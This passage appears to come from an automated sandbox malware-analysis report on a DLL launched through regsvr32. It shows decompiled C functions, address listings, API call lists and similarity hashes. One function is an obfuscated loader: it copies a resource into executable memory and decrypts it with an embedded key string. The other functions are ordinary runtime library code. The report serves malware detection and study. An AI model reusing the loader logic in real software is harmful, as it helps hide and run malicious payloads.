							_t209 =  *0x100b8260; // 0x0
							_t242 =  *0x100b825c; // 0x0
							_t123 =  *0x100b8254; // 0x0
							_t201 =  *0x100b8264; // 0x0
							_t223 =  *0x100b8258; // 0x0
							_t244 =  *0x100b825c; // 0x0
							_t245 =  *0x100b8250; // 0x0
							_t61 = _t201 + 0x2000; // -269181532
							_t220 = 0;
							__eflags = 0;
							_t124 = VirtualAlloc(0, _v92, ((_t201 * _t223 + _t244 * _t245 - _t209) * _t123 - _t201) *  *0x100b8258 + (_t123 - _t245 + 0x00000001) * _t209 -  *0x100b825c + _t61 | 0x00001000 + ((1 -  *0x100b8258) * _t201 - _t123 * _t123 -  *0x100b8250 + _t209) * 0x00000005, ((_t123 - _t242 * _t209) * _t123 - _t201 * _t209 - _t242 * _t223 + 1) * _t209 - _t201 - _t244 - _t123 + ((_t123 - _t242 * _t209) * _t123 - _t201 * _t209 - _t242 * _t223 + 1) * _t209 - _t201 - _t244 - _t123 + 0x40);
						} else {
							_t205 =  *0x100b825c; // 0x0
							_t259 =  *0x100b8250; // 0x0
							_t206 = _t205 * 3;
							_t140 =  *0x100b8258; // 0x0
							_t214 =  *0x100b8254; // 0x0
							_v84 = _t140 * 3;
							_v88 = _t206;
							_t207 =  *0x100b8260; // 0x0
							_t54 = _t207 + 3; // 0x3
							_t124 =  *0x100bc06c(0xffffffff, 0, _v92, ((_v84 - _t214 * 0x00000003) *  *0x100b8264 + 0x00000009) *  *0x100b8250 + (_t214 * 0x00000003 - _v84 - 0x00000009) * _t207 - _v88 + 0x00001000 | (1 - _t214) * _t214 - _t54 *  *0x100b8264 + (0x00000800 -  *0x100b8258) * 0x00000002 -  *0x100b825c - _t207 + (1 - _t214) * _t214 - _t54 *  *0x100b8264 + (0x00000800 -  *0x100b8258) * 0x00000002 -  *0x100b825c - _t207, (_t259 * 3 - _t206) * _t214 - _t207 * 6 + 0x40, 0); // executed
						}
						_v88 = _t124;
						memcpy(_t124, _v100, _v92);
						_t126 = malloc(0x57c0);
						_t204 =  *0x100b8250; // 0x0
						_t210 =  *0x100b8254; // 0x0
						_t179 =  *0x100b8254; // 0x0
						_v84 = _t126;
						_t127 =  *0x100b8258; // 0x0
						_t212 =  *0x100b825c; // 0x0
						_t208 =  *0x100b8264; // 0x0
						_t183 =  *0x100b8260; // 0x0
						_t256 =  *0x100b825c; // 0x0
						_t258 =  *0x100b8260; // 0x0
						L10001082();
						L1000145B();
						 *0x100bc094(_v84, _v84, _v88, _v92, (_t127 * 3 - _t208 + _t258 +  *0x100b8254 + _t204) * 3 + _v84, ((_t183 - _t208 - _t127 + 1) *  *0x100b8254 - _t256 + _t256 + _t208 + _t258 + _t204) * 4 + "ioJWT8ckiz9iT>_KLO0FiY95u@GjVFR*hl8<d3ewW+Da)gagIMNfn+<3?MyG&T4KLEuy^d?pfZ<7FMkEHD^sY>KINeVpH)kZ_cgUYXSt7c+$o3HN__lU?jXl", ((1 - _t204) * _t127 - _t210 * _t204 + _t212 *  *0x100b8260) * 3 + (_t179 * 3 - 3) * _t208 + 0x79);
						_t138 = L100010D2(_v88, _v92);
						 *0x100bc0bc = _t138;
						 *0x100bc0b8(_v96);
						_pop(_t219);
						_t239 = 1;
						_t156 = _t220;
						goto L6;
					}
				}
				return E1004763E(_t86, _t156, _v8 ^ _t274, _t208, _t219, _t239);
			}






































































































                                                                                                                0x10007dd4
                                                                                                                0x10007dd4
                                                                                                                0x10007dd4
                                                                                                                0x10007dda
                                                                                                                0x10007de1
                                                                                                                0x10007de7
                                                                                                                0x10007ded
                                                                                                                0x10007ded
                                                                                                                0x10007dee
                                                                                                                0x10008305
                                                                                                                0x10008307
                                                                                                                0x10007df4
                                                                                                                0x10007dfb
                                                                                                                0x1000830a
                                                                                                                0x1000830f
                                                                                                                0x10008315
                                                                                                                0x10008315
                                                                                                                0x10007e01
                                                                                                                0x10007e06
                                                                                                                0x10007e07
                                                                                                                0x10007e0b
                                                                                                                0x10007e0c
                                                                                                                0x10007e10
                                                                                                                0x10007e14
                                                                                                                0x10007e18
                                                                                                                0x10007e1c
                                                                                                                0x10007e20
                                                                                                                0x10007e24
                                                                                                                0x10007e28
                                                                                                                0x10007e2c
                                                                                                                0x10007e34
                                                                                                                0x10007e3a
                                                                                                                0x10007e40
                                                                                                                0x10007e46
                                                                                                                0x10007e4c
                                                                                                                0x10007e52
                                                                                                                0x10007e58
                                                                                                                0x10007e5e
                                                                                                                0x10007e64
                                                                                                                0x10007e6a
                                                                                                                0x10007e70
                                                                                                                0x10007e76
                                                                                                                0x10007e7c
                                                                                                                0x10007e82
                                                                                                                0x10007e88
                                                                                                                0x10007e8e
                                                                                                                0x10007e92
                                                                                                                0x10007e96
                                                                                                                0x10007e9c
                                                                                                                0x10007ea2
                                                                                                                0x10007ea6
                                                                                                                0x10007eac
                                                                                                                0x10007eb0
                                                                                                                0x10007eb4
                                                                                                                0x10007eba
                                                                                                                0x10007ec0
                                                                                                                0x10007ec6
                                                                                                                0x10007ecc
                                                                                                                0x10007ed2
                                                                                                                0x10007ed8
                                                                                                                0x10007ede
                                                                                                                0x10007ee2
                                                                                                                0x10007eeb
                                                                                                                0x10007ef6
                                                                                                                0x10007ef9
                                                                                                                0x10007f02
                                                                                                                0x10007f0a
                                                                                                                0x10007f15
                                                                                                                0x10007f1a
                                                                                                                0x10007f25
                                                                                                                0x10007f2a
                                                                                                                0x10007f35
                                                                                                                0x10007f3a
                                                                                                                0x10007f45
                                                                                                                0x10007f4f
                                                                                                                0x10007f5a
                                                                                                                0x10007f65
                                                                                                                0x10007f6a
                                                                                                                0x10007f78
                                                                                                                0x10007f7d
                                                                                                                0x10007f88
                                                                                                                0x10007f8d
                                                                                                                0x10007f98
                                                                                                                0x10007f9d
                                                                                                                0x10007fa8
                                                                                                                0x10007fad
                                                                                                                0x10007fb8
                                                                                                                0x10007fbd
                                                                                                                0x10007fc8
                                                                                                                0x10007fcd
                                                                                                                0x10007fd8
                                                                                                                0x10007fdd
                                                                                                                0x10007fe8
                                                                                                                0x10007fed
                                                                                                                0x10007ffd
                                                                                                                0x10008002
                                                                                                                0x1000800d
                                                                                                                0x10008012
                                                                                                                0x1000801d
                                                                                                                0x10008022
                                                                                                                0x1000802d
                                                                                                                0x10008032
                                                                                                                0x1000803d
                                                                                                                0x10008042
                                                                                                                0x1000804d
                                                                                                                0x10008057
                                                                                                                0x1000805f
                                                                                                                0x10008065
                                                                                                                0x10008070
                                                                                                                0x10008075
                                                                                                                0x1000808a
                                                                                                                0x10008091
                                                                                                                0x100080a1
                                                                                                                0x100080a4
                                                                                                                0x100080aa
                                                                                                                0x100080b0
                                                                                                                0x100080b3
                                                                                                                0x10008165
                                                                                                                0x1000816b
                                                                                                                0x10008171
                                                                                                                0x1000817f
                                                                                                                0x1000818f
                                                                                                                0x1000819a
                                                                                                                0x100081b6
                                                                                                                0x100081e8
                                                                                                                0x10008210
                                                                                                                0x10008210
                                                                                                                0x10008213
                                                                                                                0x100080b9
                                                                                                                0x100080b9
                                                                                                                0x100080bf
                                                                                                                0x100080c5
                                                                                                                0x100080c8
                                                                                                                0x100080d0
                                                                                                                0x100080de
                                                                                                                0x100080e1
                                                                                                                0x100080e4
                                                                                                                0x10008127
                                                                                                                0x1000815a
                                                                                                                0x1000815a
                                                                                                                0x1000821c
                                                                                                                0x10008223
                                                                                                                0x1000822e
                                                                                                                0x10008234
                                                                                                                0x1000823a
                                                                                                                0x10008240
                                                                                                                0x1000824f
                                                                                                                0x10008252
                                                                                                                0x1000825e
                                                                                                                0x10008270
                                                                                                                0x10008280
                                                                                                                0x10008296
                                                                                                                0x100082a2
                                                                                                                0x100082c7
                                                                                                                0x100082d5
                                                                                                                0x100082dd
                                                                                                                0x100082e9
                                                                                                                0x100082f7
                                                                                                                0x100082fc
                                                                                                                0x10008302
                                                                                                                0x10008303
                                                                                                                0x10008304
                                                                                                                0x00000000
                                                                                                                0x10008304
                                                                                                                0x10007dfb
                                                                                                                0x10008322

                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 10008097
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 100080A4
                                                                                                                • VirtualAllocExNuma.KERNEL32(000000FF,00000000,?,?,-00000040,00000000), ref: 1000815A
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,-100B625C,?), ref: 10008213
                                                                                                                • memcpy.MSVCRT ref: 10008223
                                                                                                                • malloc.MSVCRT ref: 1000822E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 100082DD
                                                                                                                • _printf.LIBCMT ref: 1000830F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocResourceVirtual$??3@LoadNumaSizeof_printfmallocmemcpy
                                                                                                                • String ID: .$.$.$2$3$c$e$e$k$mvr.$n$n$r$r$t$t$v
                                                                                                                • API String ID: 414098479-1080197306
                                                                                                                • Opcode ID: 64407883eec9e5d4b3ebde0447c007c1a9bde779a78371be9fd4498219856d1d
                                                                                                                • Instruction ID: 8a749b35a92ac8894742e7b36e387fd2e7c82a0fcd8bab04e5032650b4ed148f
                                                                                                                • Opcode Fuzzy Hash: 64407883eec9e5d4b3ebde0447c007c1a9bde779a78371be9fd4498219856d1d
                                                                                                                • Instruction Fuzzy Hash: 6AE15C7A9103289FEB04DFF9CDC59C9BBB9FF98340B01562AE404AB275E7B05A04CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10020650 Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10020650() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x100bdc5c
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x4f0cb0
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = L10001311(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = L10001311(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E10049170(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x4f0cb0
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x100b84e8;
							L10048E48( &_v28, 0x100afe38);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x100b8580;
							L10048E48( &_v36, 0x100afeec);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x100b8618;
							L10048E48( &_v44, 0x100aff30);
							asm("int3");
							_push(4);
							E1004764D(0x1008dd26, _t69, _t82, _t86);
							_t78 = E10020454(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1001DB72(_t78);
							}
							return E10047725(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x4f0cb0
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x4f0cb0
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x4f0cb0
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}































                                                                                                                0x10020650
                                                                                                                0x10020651
                                                                                                                0x10020652
                                                                                                                0x10020654
                                                                                                                0x10020656
                                                                                                                0x10020656
                                                                                                                0x1002065b
                                                                                                                0x1002065f
                                                                                                                0x10020665
                                                                                                                0x10020665
                                                                                                                0x10020668
                                                                                                                0x10020668
                                                                                                                0x1002066d
                                                                                                                0x1002067c
                                                                                                                0x1002067e
                                                                                                                0x1002067f
                                                                                                                0x10020681
                                                                                                                0x1002069e
                                                                                                                0x1002069e
                                                                                                                0x1002069e
                                                                                                                0x100206a1
                                                                                                                0x100206a1
                                                                                                                0x100206a4
                                                                                                                0x100206a6
                                                                                                                0x100206c4
                                                                                                                0x100206c7
                                                                                                                0x100206d5
                                                                                                                0x100206db
                                                                                                                0x100206de
                                                                                                                0x100206a8
                                                                                                                0x100206ab
                                                                                                                0x100206b1
                                                                                                                0x100206b5
                                                                                                                0x100206b5
                                                                                                                0x100206e4
                                                                                                                0x100206e6
                                                                                                                0x10020713
                                                                                                                0x10020715
                                                                                                                0x1002071c
                                                                                                                0x10020726
                                                                                                                0x1002072e
                                                                                                                0x10020731
                                                                                                                0x00000000
                                                                                                                0x100206e8
                                                                                                                0x100206e8
                                                                                                                0x100206e8
                                                                                                                0x100206eb
                                                                                                                0x100206ed
                                                                                                                0x100206f7
                                                                                                                0x100206f7
                                                                                                                0x10020701
                                                                                                                0x1000a035
                                                                                                                0x1000a036
                                                                                                                0x1000a038
                                                                                                                0x1000a042
                                                                                                                0x1000a049
                                                                                                                0x1000a04e
                                                                                                                0x1000a04f
                                                                                                                0x1000a050
                                                                                                                0x1000a052
                                                                                                                0x1000a05c
                                                                                                                0x1000a063
                                                                                                                0x1000a068
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1
                                                                                                                0x10020683
                                                                                                                0x10020683
                                                                                                                0x10020686
                                                                                                                0x10020686
                                                                                                                0x10020689
                                                                                                                0x10020689
                                                                                                                0x1002068c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002068e
                                                                                                                0x1002068f
                                                                                                                0x10020692
                                                                                                                0x10020694
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020694
                                                                                                                0x10020696
                                                                                                                0x10020698
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020698
                                                                                                                0x1002066f
                                                                                                                0x1002066f
                                                                                                                0x1002066f
                                                                                                                0x10020672
                                                                                                                0x10020676
                                                                                                                0x10020734
                                                                                                                0x10020734
                                                                                                                0x10020734
                                                                                                                0x10020737
                                                                                                                0x10020739
                                                                                                                0x1002073c
                                                                                                                0x1002073c
                                                                                                                0x1002073f
                                                                                                                0x10020746
                                                                                                                0x10020749
                                                                                                                0x10020749
                                                                                                                0x1002074c
                                                                                                                0x1002074f
                                                                                                                0x10020752
                                                                                                                0x1002075f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020676

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(100BDC5C,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 1002065F
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 100206B5
                                                                                                                • GlobalHandle.KERNEL32(004F0CB0), ref: 100206BE
                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 100206C7
                                                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100206DE
                                                                                                                • GlobalHandle.KERNEL32(004F0CB0), ref: 100206F0
                                                                                                                • GlobalLock.KERNEL32 ref: 100206F7
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10020701
                                                                                                                • GlobalLock.KERNEL32 ref: 1002070D
                                                                                                                • _memset.LIBCMT ref: 10020726
                                                                                                                • LeaveCriticalSection.KERNEL32(?,00000058,10006BB6), ref: 10020752
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 496899490-0
                                                                                                                • Opcode ID: b857802efc874081f982264080accc1c82b585f1a2281ce4d6776140f7bff196
                                                                                                                • Instruction ID: af271aca2a9668a8b962bf0fefcffd69e55be94dc5def31f8c145bf6bfeea780
                                                                                                                • Opcode Fuzzy Hash: b857802efc874081f982264080accc1c82b585f1a2281ce4d6776140f7bff196
                                                                                                                • Instruction Fuzzy Hash: 5A31BA756043059FE324CF34DD8CA9AB7EAFB85240B114A6EF993C3662EB70F8448B10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100470E9 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E100470E9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x100b59b0);
				_t8 = E100491EC(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10049231(_t8);
				}
				if( *0x100bff64 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x100be104, 0, ??); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10049097(_t31);
						 *_t10 = E1004905C(GetLastError());
					}
					goto L9;
				}
				E1004ED25(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = L1004EE41(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					L1004EE6C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1004713F();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                0x100470e9
                                                                                                                0x100470eb
                                                                                                                0x100470f0
                                                                                                                0x100470f5
                                                                                                                0x100470fa
                                                                                                                0x10047171
                                                                                                                0x10047176
                                                                                                                0x10047176
                                                                                                                0x10047103
                                                                                                                0x10047148
                                                                                                                0x10047149
                                                                                                                0x10047151
                                                                                                                0x10047157
                                                                                                                0x10047159
                                                                                                                0x1004715b
                                                                                                                0x1004716e
                                                                                                                0x10047170
                                                                                                                0x00000000
                                                                                                                0x10047159
                                                                                                                0x10047107
                                                                                                                0x1004710d
                                                                                                                0x10047112
                                                                                                                0x10047118
                                                                                                                0x1004711d
                                                                                                                0x1004711f
                                                                                                                0x10047120
                                                                                                                0x10047121
                                                                                                                0x10047127
                                                                                                                0x10047128
                                                                                                                0x1004712f
                                                                                                                0x10047138
                                                                                                                0x00000000
                                                                                                                0x1004713a
                                                                                                                0x1004713a
                                                                                                                0x00000000
                                                                                                                0x1004713a

                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 10047107
                                                                                                                  • Part of subcall function 1004ED25: __mtinitlocknum.LIBCMT ref: 1004ED39
                                                                                                                  • Part of subcall function 1004ED25: __amsg_exit.LIBCMT ref: 1004ED45
                                                                                                                  • Part of subcall function 1004ED25: EnterCriticalSection.KERNEL32(00000001,00000001,?,10051765,0000000D,100B5E08,00000008,10051857,00000001,?,?,00000001,?,?,10048D8A,00000001), ref: 1004ED4D
                                                                                                                • ___sbh_find_block.LIBCMT ref: 10047112
                                                                                                                • ___sbh_free_block.LIBCMT ref: 10047121
                                                                                                                • HeapFree.KERNEL32(00000000,?,100B59B0), ref: 10047151
                                                                                                                • GetLastError.KERNEL32(?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001,00000001,?,10051765,0000000D,100B5E08), ref: 10047162
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714421763-0
                                                                                                                • Opcode ID: 17a2d7f9483df9dd83aed79f50096d5afd04269e0c4dac3921156a1520c90f98
                                                                                                                • Instruction ID: eb16438e638307e8988ba5fffe0d66e953f3cb3c88f18f150f3232e091455397
                                                                                                                • Opcode Fuzzy Hash: 17a2d7f9483df9dd83aed79f50096d5afd04269e0c4dac3921156a1520c90f98
                                                                                                                • Instruction Fuzzy Hash: E9018639905356AAEF24DB758D4AB8E3BA4EF01361F300178F508E60A1CB39A940DA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10006A92 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 121 10006a92-10006a99 122 10006aa2-10006aae call 100014bf 121->122 123 10006a9b-10006a9c ExitProcess 121->123 126 10006ab1-10006ab3 122->126
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10006A92() {
				int _t1;

				_t1 =  *0x100bc0bc; // 0x4e1938
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E100014BF()))(); // executed
				return 0;
			}




                                                                                                                0x10006a92
                                                                                                                0x10006a99
                                                                                                                0x10006a9c
                                                                                                                0x10006a9c
                                                                                                                0x10006aa2
                                                                                                                0x10006aa7
                                                                                                                0x10006aaf
                                                                                                                0x10006ab3

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
